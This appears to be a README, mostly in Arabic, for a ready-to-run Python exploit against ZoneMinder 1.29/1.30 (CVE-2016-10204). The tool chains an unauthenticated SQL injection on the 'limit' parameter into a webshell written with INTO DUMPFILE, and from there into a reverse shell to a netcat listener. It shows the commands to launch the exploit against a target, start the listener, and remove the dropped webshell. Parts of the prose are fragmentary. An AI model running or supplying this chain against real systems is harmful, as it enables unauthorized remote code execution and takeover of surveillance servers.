
حقن SQL غير مُصادَق عليه لاستغلال RCE في ZoneMinder 1.29/1.30 (CVE-2016-10204، EDB-41239). إثبات مفهوم (PoC) بلغة Python لتحويل حقن SQLi بأمر واحد إلى webshell ثم إلى reverse shell.
استغلال Python جاهز للتشغيل لـ ZoneMinder 1.29/1.30 يقوم بتسلسل حقن SQL غير المصادق عليه (CVE-2016-10204، EDB-41239) وصولاً إلى reverse shell تفاعلي.
هذا PoC مسلّح/مؤتمت لثغرة CVE معروفة ومرقّعة، وليس استغلالاً جديداً.
يتوقف PoC الخاص بـ EDB لهذه الثغرة عند حمولة SQLi أو "وجّه sqlmap نحوها." هذا الاستغلال يحزم سلسلة SQLi إلى webshell إلى shell الكاملة في سكربت واحد مقروء.
SLEEP) على معامل POST limit
في index.php?view=request&request=log&task=query.SELECT ... INTO DUMPFILE،
محاولاً عدة مسارات شائعة لـ ZoneMinder/Apache.bash نحو
مستمع netcat الخاص بك.DUMPFILE، وليس OUTFILE. يقوم OUTFILE بتهريب أسطر جديدة وتشويه
PHP متعدد الأسطر؛ بينما يكتب DUMPFILE بايتات خام، فيبقى webshell صالحاً.# pop a shell
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443
# start your listener when prompted, in another terminal
sudo nc -lvnp 443
# afterwards, remove the webshell it dropped (name is printed at the end)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php
MIT، انظر LICENSE.